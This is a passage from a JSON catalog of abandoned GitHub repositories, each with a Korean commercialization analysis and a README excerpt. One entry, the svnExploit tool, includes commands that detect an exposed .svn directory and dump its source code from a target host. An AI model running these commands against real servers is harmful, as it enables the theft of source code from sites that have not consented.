쓸 수 있나\n1. **SaaS 서비스**: 클라우드 스토리지 제공업체(구글 드라이브, 드롭박스 경쟁사)의 파일 동기화 엔진으로 제공\n2. **내부 업무 도구**: 대형 게임사·영상 제작","readme_excerpt":"# News for covid-19 times\r\n\r\nWe have added support for having EACopyService sit on another machine than the network share to enable environments where the network share machine is not running windows (like NetApp etc). This means that anyone can spin up an EACopyService next to the network share and then use \"EACopy.exe ... /SERVERADDR \\<machine-with-service\\> /C\" to speed up transfers using zstd compression from the office to your home. Very simple setup.\r\n\t\r\n# EACopy\r\n\r\nEACopy is an alternative to Robocopy for copying files from one location to another. The main reason EACopy was created was to be able to provide text files containing the files/directories to copy. The second reason was to improve performance when copying large amounts of data to network share where the same files are often copied over and over again but to different destinations on the same network share. (example: \\\\myserver\\builds\\myapp\\version1\\, \\\\myserver\\builds\\myapp\\version2\\, \\\\myserver\\builds\\myapp\\version3","composite_score":0.3077,"license_safety_tag":"safe"},{"name":"bors-ng/bors-ng","github_url":"https://github.com/bors-ng/bors-ng","stars":15,"language":"Elixir","license":"apache-2.0","abandonment_months":26,"description":"# Bors-ng 상용화 분석\n\n## 왜 보물인가\n소프트웨어 개발팀이 코드 품질을 자동으로 검수하고 안전하게 합치는 과정을 완전 자동화하는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 깃허브 연동 자동 코드 검수 서비스로, 개발팀이 구독하여 매달 사용료를 내는 클라우드 솔루션\n2. **내부 업무 도구**: 대형 소프트웨어 회사의 ","readme_excerpt":"**Deprecation notice**: Though I'll still merge bug fixes if they're provided, new features will not be accepted.\nIf you want to implement a workflow like this, use [GitHub's built-in merge queue][ghmq]. See [TMIB 76] for more info.\n\n[ghmq]: https://github.blog/changelog/2023-02-08-pull-request-merge-queue-public-beta/\n[TMIB 76]: https://bors.tech/newsletter/2023/05/01/tmib-76/\n\nA merge bot for GitHub pull requests\n====================================\n\n[Bors-NG] implements a continuous-testing workflow where the main branch never breaks.\nIt integrates GitHub pull requests with a tool like [GitHub Actions] that runs\nyour tests.\n\nOther resources:\n\n* [Home page](https://bors.tech/)\n* [Documentation](https://bors.tech/documentation/)\n* [Support forum](https://forum.bors.tech/)\n\n\n# But don't GitHub's Protected Branches already do this?\n\nMost CI systems, like Jenkins and [GitHub Actions] both run the test suite on\nevery branch after it's pushed to and every pull request when it's opened, and","composite_score":0.3076,"license_safety_tag":"safe"},{"name":"janeasystems/nodejs-mobile","github_url":"https://github.com/janeasystems/nodejs-mobile","stars":6,"language":"JavaScript","license":"NOASSERTION","abandonment_months":56,"description":"# janeasystems/nodejs-mobile 사업화 분석\n\n## 왜 보물인가\n스마트폰에서도 웹 개발자의 도구를 그대로 사용할 수 있게 해주는 기술로, 개발자들의 작업 환경을 모바일로 확장시킵니다.\n\n## 어디에 쓸 수 있나\n\n**1. 모바일 앱 개발 교육 플랫폼 (SaaS)**\n- 스마트폰으로 직접 웹 개발을 배우는 온라인 강의 서비스\n- 별도 컴퓨","readme_excerpt":"[![Project Status: Unsupported – The project has reached a stable, usable state but the author(s) have ceased all work on it.](https://www.repostatus.org/badges/latest/unsupported.svg)](https://www.repostatus.org/#unsupported)\n\n:warning: The project is no longer being actively maintained by Janea Systems.  \nForks of the repos have been created on a dedicated Github org to allow community-driven development to continue:  \nhttps://github.com/nodejs-mobile\n\nNode.js for Mobile Apps\n====================================\n\nThis is the main repository for [Node.js for Mobile Apps](https://code.janeasystems.com/nodejs-mobile), a toolkit for integrating Node.js into mobile applications.\n\n## Resources for Newcomers\n* [Website](https://code.janeasystems.com/nodejs-mobile)\n* [Gitter channel](https://gitter.im/nodejs-mobile/community)\n* [Frequently Asked Questions](FAQ.md)\n\nThis is the central repository for reporting **all issues** related to the Node.js for Mobile Apps project, including issues per","composite_score":0.3075,"license_safety_tag":"unknown"},{"name":"nanchen2251/BankCardUtils","github_url":"https://github.com/nanchen2251/BankCardUtils","stars":67,"language":"Java","license":"unknown","abandonment_months":83,"description":"# BankCardUtils 보물 분석\n\n## 왜 보물인가\n은행 카드 번호의 유효성을 자동으로 검증해주는 기술로, 금융 서비스를 제공하는 모든 기업이 필요로 하는 필수 도구입니다.\n\n## 어디에 쓸 수 있나\n- **결제 플랫폼**: 온라인 쇼핑몰이나 금융 앱에서 고객이 입력한 카드 정보의 오류를 미리 걸러내는 검증 기능\n- **B2B API 서비스**: 카","readme_excerpt":"# BankCardUtils\n#### @Deprecated(\"该库采用的方法简单暴力，主要采用的是匹配方式进行处理，所以一定会存在银行卡数据不全面的问题，所以不推荐大家继续使用，且用且珍惜吧~\")\n\n根据银行卡号 获取 银行卡类型、银行名称和银行编码 自动格式化银行卡号、手机号、身份证号输入的工具类\n\n## 效果图<br>\n![](https://github.com/nanchen2251/BankCardUtils/blob/master/GIF.gif)\n\n#### ⊙开源不易，希望给个star或者fork奖励\n#### ⊙拥抱开源：https://github.com/nanchen2251/\n#### ⊙交流群（拒绝无脑问）：118116509 <a target=\"_blank\" href=\"//shang.qq.com/wpa/qunwpa?idkey=e6ad4af66393684e1d0c9441403b049d2d5670ec0ce9f72150e694cbb7c16b0a\"><img border=\"0\" src=\"http://pub.idqqimg.com/wpa/images/group.png\" alt=\"Android神技侧漏交流群\" title=\"Android神技侧漏交流群\"></a>( 点击图标即可加入 )<br>\n\n## 特点\n- 支持自动根据银行卡号获取出银行名称、银行编码、银行卡类型\n- 银行相关信息都比较全，无需每次去都 xls 类型的 bin 文件\n- 支持自动格式化手机号、身份证号、银行卡号输入\n  - 手机号：xxx xxxx xxxx\n  - 身份证号：xxxxxx xxxx xxxx xxxx\n  - 银行卡号：xxxx xxxx xxxx xxxx\n  \n## 使用方法\n#### 1、添加依赖<br>\n##### Step 1. Add it in your root build.gradle at the end of repositories:\n```java\nallprojects {\n\t\trepositories {\n\t\t\t...\n\t\t\tmaven { url 'https://jitpack.io' }\n\t\t}\n\t}\n```\n##### Step 2. Add the dependency\n`","composite_score":0.3075,"license_safety_tag":"unknown"},{"name":"reed-hong/awesome-libra","github_url":"https://github.com/reed-hong/awesome-libra","stars":8,"language":"","license":"unknown","abandonment_months":64,"description":"","readme_excerpt":"# Awesome Libra [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome)<!-- omit in toc --> \nA Curated List of Awesome Libra Resources\n\n# Contents <!-- omit in toc --> \n- [Official Resources](#official-resources)\n- [Tools](#tools)\n  - [Wallets](#wallets)\n  - [Block Explorer](#block-explorer)\n- [SDK](#sdk)\n  - [JavaScript](#javascript)\n  - [Python](#python)\n  - [Go](#go)\n  - [Java](#java)\n- [Develop](#develop)\n  - [IDE](#ide)\n  - [Courses](#courses)\n  - [Move](#move)\n  - [Others](#others)\n- [EcoProjects](#ecoprojects)\n- [Community](#community)\n- [Others](#others-1)\n  - [Article](#article)\n  - [Video](#video)\n\n\n# Official Resources\n* [Website](https://libra.org) - Official Libra website\n*  [Official Docs](https://developers.libra.org/docs/welcome-to-libra) - Welcome to the Libra developer site.\n* [White Paper](https://libra.org/en-US/white-paper/) - Official description of the Libra\n* [Int","composite_score":0.3075,"license_safety_tag":"unknown"},{"name":"ArkEcosystem/ark-desktop","github_url":"https://github.com/ArkEcosystem/ark-desktop","stars":5,"language":"TypeScript","license":"mit","abandonment_months":39,"description":"# ARK Desktop 저장소 분석\n\n## 왜 보물인가\n암호화폐 ARK를 쉽게 관리할 수 있는 개인용 지갑 애플리케이션으로, 비트코인처럼 복잡한 기술을 모르는 사람도 자산을 안전하게 보관하고 거래할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: ARK 암호화폐 보유자를 위한 구독형 지갑 관리 서비스 (고급 분석, 포트폴리오 추적","readme_excerpt":"# ARK Desktop Wallet\n\n![Ark Desktop Wallet](./banner.png)\n\n[![Build Status](https://badgen.now.sh/github/status/ArkEcosystem/desktop-wallet)](https://github.com/ArkEcosystem/desktop-wallet/actions?query=branch%3Adevelop)\n[![Latest Version](https://badgen.now.sh/github/release/ArkEcosystem/desktop-wallet)](https://github.com/ArkEcosystem/desktop-wallet/releases)\n[![License: MIT](https://badgen.now.sh/badge/license/MIT/green)](https://opensource.org/licenses/MIT)\n\n> **Warning**\n> The ARK Desktop Wallet is no longer supported. Please use the new ARKVault wallet instead: https://app.arkvault.io\n\n## Download\n\n[Latest Release](https://github.com/ArkEcosystem/ark-desktop/releases/latest)\n\n## Installing via Package Managers\n\n### Arch Linux\n\nInstall via [AUR](https://aur.archlinux.org/packages/ark-desktop):\n\n> Manjaro\n\n```shell\npamac build ark-desktop\n```\n\n### Mac OS X\n\nInstall via [Homebrew](https://brew.sh/):\n\n```shell\nbrew install --cask ark-desktop-wallet\n```\n\n## Translations\n\nTranslations ","composite_score":0.3074,"license_safety_tag":"safe"},{"name":"npubird/KnowledgeGraphCourse","github_url":"https://github.com/npubird/KnowledgeGraphCourse","stars":6,"language":"","license":"unknown","abandonment_months":13,"description":"# KnowledgeGraphCourse 분석\n\n## 왜 보물인가\n복잡한 정보들을 체계적으로 연결하고 관리하는 방법을 배울 수 있는 교육 자료로, AI 시대에 데이터를 지능적으로 조직하는 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업의 내부 지식을 자동으로 정리해주는 \"회사 위키 자동화 서비스\"\n2. **내부 업무 도구**","readme_excerpt":"# A systematic course about knowledge graph for graduate students, interested researchers and engineers. \n东南大学《知识图谱》研究生课程  \n时间：春季学期（2月下旬\\~5月中旬）  \n地点：东南大学九龙湖校区  \n授课人：汪鹏   \n答疑/讨论/建议：请致信 pwang AT seu.edu.cn\n\n\n# 课程内容\n## 第0讲 课程介绍（2025-02-21）\n**课件下载**:[2025-pub-0课程介绍.pdf](https://github.com/npubird/KnowledgeGraphCourse/blob/master/2025-pub-0%E8%AF%BE%E7%A8%8B%E4%BB%8B%E7%BB%8D.pdf)\n## 第1讲 知识图谱概论 （2025-02-21，02-28，03-07）  \n1.1 认知智能的知识图谱视角浅析\n+ 知识视角的认知智能\n+ 知识图谱本质\n+ 知识图谱的演化和形成过程  \n+ 知识图谱 VS 深度学习  \n+ 知识图谱 VS 传统知识库 VS 数据库 \n+ 知识图谱应用场景\n+ 知识图谱本质和核心价值\n\n1.2 知识图谱的技术体系剖析\n+ 知识抽取\n+ 知识融合\n+ 知识表示学习\n+ 知识推理\n+ 知识存储\n\n1.3 知识图谱的瓶颈、问题和挑战的思考\n+ 知识获取挑战\n+ 知识质量挑战\n+ 知识的智能应用挑战\n\n**课件下载**:\n[2025-partA](https://github.com/npubird/KnowledgeGraphCourse/blob/master/2025-pub-1%20%E7%9F%A5%E8%AF%86%E5%9B%BE%E8%B0%B1-%E7%90%86%E8%AE%BA-%E6%8A%80%E6%9C%AF-%E5%AE%9E%E8%B7%B5%E5%92%8C%E6%8C%91%E6%88%98A.pdf)   \n[2025-partB](https://github.com/npubird/KnowledgeGraphCourse/blob/master/2025-pub-1%20%E7%9F%A5%E8%AF%86%E5%9B%BE%E8%B0%B1-%E","composite_score":0.3074,"license_safety_tag":"unknown"},{"name":"adafruit/Adafruit_ADXL345","github_url":"https://github.com/adafruit/Adafruit_ADXL345","stars":139,"language":"C++","license":"NOASSERTION","abandonment_months":26,"description":"# Adafruit ADXL345 저장소 분석\n\n## 왜 보물인가\n스마트폰이나 게임 컨트롤러처럼 기울기와 움직임을 감지하는 센서를 쉽게 제어할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **IoT 센서 플랫폼**: 건설현장 장비의 기울기를 실시간 모니터링하는 안전 관리 서비스\n2. **스포츠 분석 API**: 운동선수의 움직임 데이터를 수집해 자","readme_excerpt":"# Adafruit ADXL345 [![Build Status](https://github.com/adafruit/Adafruit_ADXL345/workflows/Arduino%20Library%20CI/badge.svg)](https://github.com/adafruit/Adafruit_ADXL345/actions)[![Documentation](https://github.com/adafruit/ci-arduino/blob/master/assets/doxygen_badge.svg)](http://adafruit.github.io/Adafruit_ADXL345/html/index.html)\n\nThis driver is for the Adafruit ADXL345 Breakout (http://www.adafruit.com/products/1231), and is based on Adafruit's Unified Sensor Library (Adafruit_Sensor).\nTested and works great with the Adafruit ADXL345 Breakout Board\n[<img src=\"https://cdn-shop.adafruit.com/970x728/1231-00.jpg\" width=\"500px\">](https://www.adafruit.com/products/1231)\nAdafruit invests time and resources providing this open source code, please support Adafruit and open-source hardware by purchasing products from Adafruit!\n\n## About the ADXL345 ##\n\nThe ADXL345 is a digital accelerometer that supports both SPI and I2C mode, with adjustable data rata and 'range' (+/-2/4/8/16g).  The Adafru","composite_score":0.3073,"license_safety_tag":"unknown"},{"name":"burntmybagel/OSCP-Prep","github_url":"https://github.com/burntmybagel/OSCP-Prep","stars":6,"language":"","license":"unknown","abandonment_months":45,"description":"# OSCP-Prep 저장소 평가\n\n## 왜 보물인가\n보안 관련 자격증 시험을 준비하는 사람들을 위해 체계적으로 정리된 학습 자료 모음으로, 수천 명이 이 자격증을 준비하고 있어 수요가 확실합니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼**: 보안 자격증 취득을 목표로 하는 수강생들을 위한 구조화된 커리큘럼 판매\n2. **기업 직원 교육 ","readme_excerpt":"# OSCP-PWK-Prep-Resources-\nUPDATE 06/01/2020: Hey there friends, I have been very quiet on here, I was surprised to see more people have starred this \"guide\" more than I expected, so I am glad this provides some use to folks. I do plan on being more active now on here now as I start my OSCP jouney once again. Unfortunately I underestimated the depth of the course and so pretty much found myself struggling in the labs =(. During my time away I have been doing some background studying but not as focused as I want to be before signing up for the lab again. My goal was to actually start again this summer but 2 things occured, Offsec updated the labs and now if I want the updated material AND additional lab time I am looking at spending $999 so I have some $$$ to save. The 2nd delay is because of covid-19, I am blessed to still be working currently but we have idea if things will take a turn so for now I am holding on tight to my purse strings lol. Once I have a better cushion for myself I ","composite_score":0.3072,"license_safety_tag":"unknown"},{"name":"Smerity/sha-rnn","github_url":"https://github.com/Smerity/sha-rnn","stars":87,"language":"Python","license":"unknown","abandonment_months":55,"description":"","readme_excerpt":"# Single Headed Attention RNN\n\nFor full details see the paper [Single Headed Attention RNN: Stop Thinking With Your Head](https://arxiv.org/abs/1911.11423).\n\nIn summary, \"stop thinking with your (attention) head\".\n\n- Obtain strong results on a byte level language modeling dataset (enwik8) in under 24 hours on a single GPU (12GB Titan V)\n- Support long range dependencies (up to 5000 tokens) without increasing compute time or memory usage substantially by using a simpler attention mechanism\n- Avoid the fragile training process required by standard Transformer models such as a long warmup\n- Back off toward a standard LSTM allowing you to drop retained memory states (needed for a Transformer model) if memory becomes a major constraint\n- Provide a smaller model that features only standard components such as the LSTM, single headed attention, and feed-forward modules such that they can easily be productionized using existing optimized tools and exported to various formats (i.e. ONNX)\n\n| Mode","composite_score":0.3071,"license_safety_tag":"unknown"},{"name":"gzc426/leetcode","github_url":"https://github.com/gzc426/leetcode","stars":5,"language":"C++","license":"unknown","abandonment_months":38,"description":"# LeetCode 문제 풀이 저장소 분석\n\n## 왜 보물인가\n프로그래밍 면접을 준비하는 사람들이 실제 풀이 코드를 참고하며 학습할 수 있는 실용적인 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 면접 대비 강좌에서 학생들에게 참고 솔루션 제공\n2. **기업 신입 채용 준비 프로그램**: 대기업이 입사 지원자들을 위한 ","readme_excerpt":"# leetcode\n每天一道leetcode\n>今天是2018年11月23,公众号：程序员乔戈里 博主会在毕业前每天刷一道leetcode,目前已经建立了leetcode刷题打卡群，需要的加我微信sometimesnaive123,进群，一周至少提交一道\n","composite_score":0.3071,"license_safety_tag":"unknown"},{"name":"DXY-F2E/api-mocker","github_url":"https://github.com/DXY-F2E/api-mocker","stars":5,"language":"JavaScript","license":"gpl-3.0","abandonment_months":31,"description":"# api-mocker 사업화 분석\n\n## 왜 보물인가\n개발자들이 실제 서버 없이도 가짜 데이터로 앱을 테스트할 수 있게 해주는 효율적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **모바일앱 개발 플랫폼**: 앱 개발사들이 백엔드 완성을 기다리지 않고 동시에 개발할 수 있는 환경 제공\n2. **팀 협업 SaaS**: 디자이너, 개발자, 기획자가 실제 서","readme_excerpt":"# 接口管理系统 - API Mocker\n\n**Hi all，好久不见！API Mocker重新开始维护了，也许不会太快，但一直都在～**\n\n> API Mocker，不仅仅是Mocker，它致力于解决前后端开发协作过程中出现的各类问题，提高开发效率，对接口做统一管理，同时也能为后续的迭代维护提供更便捷的方式。\n\n## 目录\n- [系统功能](#系统功能)\n- [技术栈与第三方库](#技术栈与第三方库)\n- [安装与启动](#安装与启动)\n- [部署相关](#部署相关)\n\n## 系统功能\n\n### 接口约定\n\nAPI Mocker提供操作简单但功能丰富的接口编辑，接口约定者能方便的设置接口的各类信息，其中：\n\n- 结构化的接口参数输入与输出\n  - 支持不同维度的请求参数约定（`query`，`body`，`path`, `header`）\n  - 支持参数的类型约定（`string`，`number`，`boolean`，`object`，`array`）\n  - 参数备注、示例\n- 支持Json数据逆向生成参数结构\n- 保留一定接口历史记录\n\n![](https://user-gold-cdn.xitu.io/2017/9/15/e4728e628394957924f586517e8d8b1b)\n\n### Mock数据\n\nAPI Mocker认为，mock不仅仅体现在返回数据中，mock请求本身也应该符合接口约定。因此，我们提供更加符合业务场景的mock服务。\n\n- Mock请求会根据接口约定，自动生成假数据。\n- Mock请求会根据接口约定，对请求参数做校验。（校验是否选填、参数类型是否正确）。\n- 根据接口约定与用户设置，能模拟不同的网络响应状态，如：`200`，`404`，`500`。\n- 支持接口代理，代理mock请求到线上or测试地址，避免开发环境跨域，省下Charles代理过程。\n- 支持[Mock.js](http://mockjs.com/)语法。\n\n### 接口文档\n\nAPI Mocker会根据接口约定自动生成简洁优美、结构清晰的接口文档。同时，可以订阅接口，当接口发生变化时，及时收到邮件通知；也可以按组订阅接口，当组内接口发生修改、增加、删除时，能收到相应的邮件通知。\n\n![](https://user-gold-cdn.xitu.io/2","composite_score":0.3071,"license_safety_tag":"restricted"},{"name":"AnonymousX1025/AnonXMusic","github_url":"https://github.com/AnonymousX1025/AnonXMusic","stars":278,"language":"Python","license":"MIT","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.3071,"license_safety_tag":"safe"},{"name":"cferdinandi/gulp-boilerplate","github_url":"https://github.com/cferdinandi/gulp-boilerplate","stars":9,"language":"JavaScript","license":"mit","abandonment_months":63,"description":"# Gulp Boilerplate 분석\n\n## 왜 보물인가\n웹사이트를 만들 때 반복되는 초기 설정 작업을 자동으로 해주는 템플릿으로, 개발자들이 실제 작업에만 집중할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **웹 개발 교육 플랫폼**: 초보 개발자들이 복잡한 초기 설정 없이 바로 코딩을 시작할 수 있는 학습 도구로 제공\n2. **프리랜서 개발자","readme_excerpt":"# Gulp Boilerplate [![Build Status](https://travis-ci.org/cferdinandi/gulp-boilerplate.svg)](https://travis-ci.org/cferdinandi/gulp-boilerplate)\n\nA boilerplate for building web projects with [Gulp](https://gulpjs.com/). Uses Gulp 4.x.\n\n_**IMPORTANT:** This project is no longer maintained, and is offered as-is. It is strongly recommended that you instead use my [Build Tool Boilerplate](https://github.com/cferdinandi/build-tool-boilerplate)._\n\n**Features**\n\n- Concatenate, minify, and lint JavaScript.\n- Compile, minify, autoprefix, and lint Sass.\n- Optimize SVGs.\n- Copy static files and folders into your `dist` directory.\n- Automatically add headers and project details to JS and CSS files.\n- Create polyfilled and non-polyfilled versions of JS files.\n- Watch for file changes, and automatically recompile build and reload webpages.\n\n**Gulp Boilerplate makes it easy to turn features on and off**, so you can reuse it for all of your projects without having to delete or modify tasks.\n\n\n\n## Gett","composite_score":0.3071,"license_safety_tag":"safe"},{"name":"armfly/H7-TOOL_STM32H7_App","github_url":"https://github.com/armfly/H7-TOOL_STM32H7_App","stars":7,"language":"C++","license":"unknown","abandonment_months":63,"description":"# H7-TOOL STM32H7 앱 분석 리포트\n\n## 왜 보물인가\n산업용 마이크로칩 개발 및 테스트를 위한 전문 도구로, 제조업 현장에서 필수적인 장비 제어 소프트웨어입니다.\n\n## 어디에 쓸 수 있나\n1. **반도체 제조사 내부 도구**: STM32H7 칩 생산 라인의 품질 검사 및 프로그래밍 자동화\n2. **전자제품 개발사 API 판매**: 임베디드 ","readme_excerpt":"<div align=\"center\" class=\"has-mb-6\">\n\n![logo][logo]\n\n## :wrench: H7-TOOL 多功能开发工具\n\n[淘宝链接][淘宝链接] |\n[开发文档][开发文档] |\n[论坛][论坛]\n\n![H7-TOOL_IMG][H7-TOOL_IMG]\n\n</div>\n\n### :book: 简介 / Overview\n\n为单片机工程师提供一款实用的多功能开发调试工具。\n\n相信很多人有带板子回家调试、或带板子出差调试的情况。因为产品问题是无法预知的，多半情况不可能带齐全套测试工具的。经常遇到手边缺万用表、缺示波器、缺串口线、缺逻辑分析仪而导致工作很难继续。\n\n`H7-TOOL` 是一款多功能测试工具，体积和 `J-Link` 一样大，方便携带。手边常备一个以备不时之需。\n\n### :gift: 功能特性 / Features\n\n1. 双通道虚拟示波器\n2. 逻辑分析仪 (未完成)\n3. USB-RS485 转换器\n4. USB-RS232 转换器\n5. USB-TTL 串口转换器\n6. USB-CAN 转换器 (未完成)\n7. DAP-Link 仿真器 / 下载器\n8. 脱机烧录器 (已完成STM32、MM32、GD32、新唐ARM、新唐8051、AT32、APM32、RT1052; SPI Flash)\n9. I2C 控制器 \n10. SPI 控制器\n11. GPIO 输入输出控制器\n12. 模拟信号发生器\n13. PWM 发生器 (未完成)\n14. 脉冲测量(频率、占空比、个数)\n15. 频率计 (未完成)\n16. 负载电流电压示波器\n17. 高侧电流表 & 电池放电容量测量\n18. 双通道电压表\n18. 电阻测量 通断蜂鸣\n19. NTC温度测量\n20. 二极管测量\n21. 微型数控电源\n22. 串口数据监视器\n23. lua小程序\n24. 8通道DS18B20温度表\n\n\n### :construction: 任务列表 / TODO\n<!-- 以下为示例 -->\n- [ ] DAP-Link\n  - [x] DAP-Link 实现RTT打印功能\n  - [ ] 联机下载\n- [ ] 逻辑分析仪\n  - [ ] 底层驱动编码 (FMC、DMA、TIM)\n  - [ ] 兼容第三方上位机\n- [ ] 脱机烧录器\n  ","composite_score":0.3071,"license_safety_tag":"unknown"},{"name":"hasherezade/dll_to_exe","github_url":"https://github.com/hasherezade/dll_to_exe","stars":5,"language":"C++","license":"unknown","abandonment_months":35,"description":"# dll_to_exe 저장소 분석\n\n## 왜 보물인가\nWindows 프로그램 파일을 다른 형식으로 변환할 수 있는 도구로, 소프트웨어 유지보수와 호환성 문제를 해결하는 틈새 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 기업의 레거시 시스템 관리 프로그램을 현대 환경에 맞게 변환하는 자동화 솔루션\n2. **API 판매**: 개발자들","readme_excerpt":"# DLL_to_EXE\n[![Build status](https://ci.appveyor.com/api/projects/status/hxiohu0j69iia1t4?svg=true)](https://ci.appveyor.com/project/hasherezade/dll-to-exe)\n[![GitHub release](https://img.shields.io/github/release/hasherezade/dll_to_exe.svg)](https://github.com/hasherezade/dll_to_exe/releases)\n[![Github All Releases](https://img.shields.io/github/downloads/hasherezade/dll_to_exe/total.svg)](https://github.com/hasherezade/dll_to_exe/releases)\n\nConverts a DLL into a ready-to-use EXE.<br/>\n<b>Supports both 32 and 64 bit DLLs</b>\n\n***Read more [here](https://hshrzd.wordpress.com/2016/07/21/how-to-turn-a-dll-into-a-standalone-exe/).***\n\nBuilds\n-\nDownload the latest [release](https://github.com/hasherezade/dll_to_exe/releases).\n\nClone\n-\nUse recursive clone to get the repo together with all the submodules:\n<pre>\ngit clone --recursive https://github.com/hasherezade/dll_to_exe.git\n</pre>\n","composite_score":0.307,"license_safety_tag":"unknown"},{"name":"zhezhaoa/ngram2vec","github_url":"https://github.com/zhezhaoa/ngram2vec","stars":7,"language":"Python","license":"unknown","abandonment_months":82,"description":"# ngram2vec 상용화 분석\n\n## 왜 보물인가\n텍스트에서 의미 있는 패턴을 자동으로 찾아내는 기술로, 고객 리뷰 분석이나 콘텐츠 분류 같은 실무 문제를 저비용으로 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS**: 이커머스 플랫폼의 상품 리뷰 자동 분석 및 요약 서비스\n- **내부 업무 도구**: 기업의 고객 피드백이나 이메일을 자","readme_excerpt":"# Ngram2vec\nNgram2vec toolkit is originally used for reproducing results of the paper\n<a href=\"http://www.aclweb.org/anthology/D17-1023\"><em>Ngram2vec: Learning Improved Word Representations from Ngram Co-occurrence Statistics</em></a>\n, aiming at learning high quality word embedding and ngram embedding.\n\nThansks to its well-designed architecture (we will talk about it later), ngram2vec toolkit provides a general and powerful framework, which is able to include researches of a large amount of papers and many popular toolkits such as word2vec. Ngram2vec toolkit allows researchers to learn representations upon co-occurrence statistics easily. Ngram2vec can generate embeddings of different granularities (beyond word embedding). For example, ngram2vec toolkit could be used for learning text embedding. Text embeddings trained by ngram2vec are very competitive. They outperform many deep and complex neural networks and achieve state-of-the-art results on a range of datasets. More details will","composite_score":0.307,"license_safety_tag":"unknown"},{"name":"admintony/svnExploit","github_url":"https://github.com/admintony/svnExploit","stars":7,"language":"Python","license":"unknown","abandonment_months":42,"description":"# svnExploit 저장소 분석\n\n## 왜 보물인가\n버전 관리 시스템의 보안 취약점을 찾아내는 도구로, 기업의 숨겨진 소스 코드 유출 위험을 진단할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **보안 진단 SaaS**: 기업이 자신의 서버 보안을 주기적으로 검사하는 구독 서비스\n- **개발팀 내부 도구**: 대기업의 개발팀이 배포 전 소스 코드 노출 ","readme_excerpt":"![](https://blog-1252108140.cosbj.myqcloud.com/201910/1571274472.8948846.png)\n\n如果您喜欢的话，希望您可以关注一下我们的微信公众号。\n\n# SvnExploit\n\nSvnExploit是一款SVN源代码利用工具，其完美支持SVN<1.7版本和SVN>1.7版本的SVN源代码泄露，更多请阅读：\n\n[SVN源代码泄露利用工具](http://www.admintony.com/SVN源代码泄露利用工具.html)\n\n[《SVN源代码泄露利用工具-SvnExploit》升级版](http://www.admintony.com/svnExploit-update.html)\n\n# Useage\n\n安装依赖库\n\n```\nsudo pip install -r requirements.txt\n```\n\n查看帮助\n\n```\npython SvnExploit.py -h\n```\n\n检测SVN源代码泄露\n\n```\npython SvnExploit.py -u http://192.168.27.128/.svn\n```\n\n下载源代码\n\n```\npython SvnExploit.py -u http://192.168.27.128/.svn --dump\n```\n\n# Example\n\n## svn > 1.7版本\n\n![](https://blog-1252108140.cosbj.myqcloud.com/201811/1543591373.3777962.png)\n\n```\npython .\\svnExploit.py -u http://192.168.27.128/unit-2/lab3/.svn/\n ____             _____            _       _ _\n/ ___|_   ___ __ | ____|_  ___ __ | | ___ (_) |_\n\\___ \\ \\ / / '_ \\|  _| \\ \\/ / '_ \\| |/ _ \\| | __|\n ___) \\ V /| | | | |___ >  <| |_) | | (_) | | |_\n|____/ \\_/ |_| |_|_____/_/\\_\\ .__/|_|\\___/|_|\\__|\n   ","composite_score":0.307,"license_safety_tag":"unknown"},{"name":"stevenleeg/geemusic","github_url":"https://github.com/stevenleeg/geemusic","stars":5,"language":"","license":"gpl-3.0","abandonment_months":48,"description":"# geemusic 프로젝트 분석\n\n## 왜 보물인가\n음악 스트리밍 서비스를 직접 제어할 수 있는 자동화 도구로, 음악 애호가들이 자신의 음악 라이브러리를 더 편하게 관리하고 활용할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **음악 큐레이션 SaaS**: 사용자가 자동으로 맞춤형 플레이리스트를 생성·관리하는 구독 서비스\n2. **스마트홈 통합 도","readme_excerpt":"This repository has been [moved to SourceHut](https://git.sr.ht/~vesto/geemusic).\n","composite_score":0.3069,"license_safety_tag":"restricted"},{"name":"alibaba/designable","github_url":"https://github.com/alibaba/designable","stars":12,"language":"TypeScript","license":"MIT","abandonment_months":14,"description":"# alibaba/designable 분석\n\n## 왜 보물인가\n복잡한 프로그래밍 없이 드래그&드롭으로 웹 페이지나 애플리케이션을 만들 수 있는 '저코드(Low-Code)' 도구로, 개발자가 아닌 일반인도 디지털 제품을 빠르게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소기업을 위한 \"5분 만에 비즈니스 관리 앱 만들기\" ","readme_excerpt":"<p align=\"center\">\n<img width=\"600\" src=\"https://img.alicdn.com/imgextra/i1/O1CN01bg1tTN1p5ZOPmhKV0_!!6000000005309-55-tps-2200-981.svg\">\n</p>\n\n---\n\n## Introduction\n\nIf you are worrying about something builder, Such as form builder/table builder/chart builder/app builder etc.\nDesignable is your perfect choice.\n\n## Screenshot\n\n<img src=\"https://img.alicdn.com/imgextra/i1/O1CN01UYmA8f1apczHZRygt_!!6000000003379-2-tps-3040-1802.png\" style=\"box-shadow:0px 0px 20px #aaa;border:1px solid #ddd\"/>\n\n## Features\n\n- 🚀 High performance, Smooth and beautiful drag and drop experience\n- 💡 Full scene coverage\n- 🎨 Support Low Code and No Code\n- 🏅 Strong scalability\n\n## Website\n\n[playground](https://designable.netlify.app)\n\n## Contributors\n\nThis project exists thanks to all the people who contribute.\n\n<p>\n<a href=\"https://github.com/alibaba/designable/graphs/contributors\"><img src=\"https://contrib.rocks/image?repo=alibaba/designable\" /></a>\n</p>\n","composite_score":0.3068,"license_safety_tag":"safe"},{"name":"ShawnHymel/tinyml-example-anomaly-detection","github_url":"https://github.com/ShawnHymel/tinyml-example-anomaly-detection","stars":180,"language":"Jupyter Notebook","license":"unknown","abandonment_months":68,"description":"# 